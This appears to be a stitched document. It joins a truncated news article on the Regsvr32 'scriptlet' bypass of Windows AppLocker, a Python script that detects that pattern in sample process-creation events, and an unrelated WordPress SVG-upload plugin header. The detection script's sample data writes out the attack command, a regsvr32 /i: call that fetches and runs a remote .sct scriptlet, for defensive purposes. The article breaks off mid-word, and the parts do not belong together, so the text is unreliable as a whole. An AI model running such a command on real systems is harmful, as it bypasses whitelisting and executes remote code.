Clever hackers can bypass Microsoft's Windows AppLocker security feature by abusing a hidden trait of the Regsvr32 command-line utility that's normally used to register DLLs on a Windows computer.
AppLocker is an application-whitelisting feature introduced with Windows 7 and Windows Server 2008 R2 that lets administrators specify which users or groups may run which executables, scripts, installers and DLLs.
Regsvr32 is a command-line utility used by installers and batch scripts to register a DLL. Registering a DLL machine-wide (under HKLM) needs administrator privileges, which is what is supposed to keep the tool from being abused.
Attacks are hard to detect
According to security researcher Casey Smith, an attacker who already has a foothold on a Windows workstation can point Regsvr32 at a COM scriptlet (.sct file) hosted on the Internet; Regsvr32 fetches it and the script it contains is executed through the scrobj.dll scriptlet handler, rather than any DLL actually being registered on the local machine.
The attacker won't need admin privileges; Regsvr32 is proxy aware, can work with TLS content, follo
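As an added example (not from the article and not Casey Smith's own tooling), the following Python script scans constructed process-creation events for the Regsvr32 pattern described above: a /i: argument that points at a URL or a .sct scriptlet, scrobj.dll as the library being registered, and the /n plus /i: switch pair (documented Regsvr32 semantics: skip DllRegisterServer, call DllInstall with the given string). The JSON-lines event format, host names, user names and the 203.0.113.7 address are made-up sample data.

```python
import json
import re
from urllib.parse import urlparse

# Constructed sample process-creation events (JSON lines); not real telemetry.
# Event 1 and event 4 are the regsvr32 scriptlet pattern; the others are benign.
SAMPLE_EVENTS = r"""
{"host": "WS01", "user": "alice", "image": "C:\\Windows\\System32\\regsvr32.exe", "cmdline": "regsvr32 /s /n /u /i:http://203.0.113.7/update.sct scrobj.dll"}
{"host": "WS02", "user": "bob", "image": "C:\\Windows\\System32\\regsvr32.exe", "cmdline": "regsvr32 /s \"C:\\Program Files\\Vendor\\vendor.dll\""}
{"host": "WS02", "user": "bob", "image": "C:\\Windows\\System32\\regsvr32.exe", "cmdline": "\"C:\\Windows\\System32\\regsvr32.exe\" /s /u \"C:\\Program Files\\Vendor\\vendor.dll\""}
{"host": "WS03", "user": "carol", "image": "C:\\Windows\\System32\\regsvr32.exe", "cmdline": "regsvr32.exe /s /n /u /i:C:\\Users\\Public\\thing.sct scrobj.dll"}
{"host": "WS03", "user": "carol", "image": "C:\\Windows\\System32\\notepad.exe", "cmdline": "notepad.exe C:\\Users\\carol\\note.sct"}
"""

SCT_RE = re.compile(r"\.sct$", re.IGNORECASE)


def split_cmdline(cmdline: str) -> list[str]:
    """Split a Windows command line on whitespace, keeping double-quoted runs together."""
    return [tok.strip('"') for tok in re.findall(r'"[^"]*"|\S+', cmdline)]


def regsvr32_findings(cmdline: str) -> list[str]:
    """Return the suspicious traits of a regsvr32 command line (empty list if none)."""
    tokens = split_cmdline(cmdline)
    if not tokens:
        return []
    # Executable name without its directory, on either path-separator style.
    exe = tokens[0].rsplit("\\", 1)[-1].rsplit("/", 1)[-1].lower()
    if exe not in ("regsvr32", "regsvr32.exe"):
        return []

    findings: list[str] = []
    switches: set[str] = set()
    for tok in tokens[1:]:
        low = tok.lower()
        if low[:1] in "/-" and len(low) > 1:
            switches.add(low[1])
            if low.startswith(("/i:", "-i:")):
                target = tok[3:]
                if urlparse(target).scheme in ("http", "https"):
                    findings.append(f"/i: points at a remote URL ({target})")
                if SCT_RE.search(target):
                    findings.append("/i: argument is a COM scriptlet (.sct)")
        elif low.endswith("scrobj.dll"):
            findings.append("registers scrobj.dll, the scriptlet handler")
        elif SCT_RE.search(low):
            findings.append("passes a .sct file as the DLL argument")
    if "n" in switches and "i" in switches:
        findings.append("/n with /i: DllRegisterServer skipped, DllInstall called with the /i: string")
    return findings


def scan_events(jsonl: str) -> list[dict]:
    """Parse JSON-lines process events and return those whose command line matches."""
    hits = []
    for line in jsonl.splitlines():
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        findings = regsvr32_findings(ev.get("cmdline", ""))
        if findings:
            hits.append({"host": ev["host"], "user": ev["user"],
                         "cmdline": ev["cmdline"], "findings": findings})
    return hits


if __name__ == "__main__":
    for hit in scan_events(SAMPLE_EVENTS):
        print(f"{hit['host']} {hit['user']}: {hit['cmdline']}")
        for reason in hit["findings"]:
            print(f"    - {reason}")
```

The check keys on the argument shape rather than on the process name alone, because legitimate installers run regsvr32 constantly; the two benign events above produce no findings, while the scriptlet invocations each produce several. In a real deployment the same logic would be applied to Sysmon Event ID 1 or Security Event ID 4688 command-line fields, and a hit on a local .sct path (event 4) is worth the same triage as a remote one.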
vadyua / lc-svg-upload.php
Last active September 8, 2018 08:21 — forked from Lewiscowles1986/lc-svg-upload.php
SVG Media Plugin for WordPress (Works since 4.1.2!)
<?php
/*
Plugin Name: SVG Upload
Plugin URI: http://www.lewiscowles.co.uk
Description: Super PHP Plugin to add Full SVG Media support to WordPress, I should live in {$webroot}/wp-content/plugins/ folder ;)
Author: Lewis Cowles
Version: 1.5.8
Author URI: http://www.lewiscowles.co.uk/
*/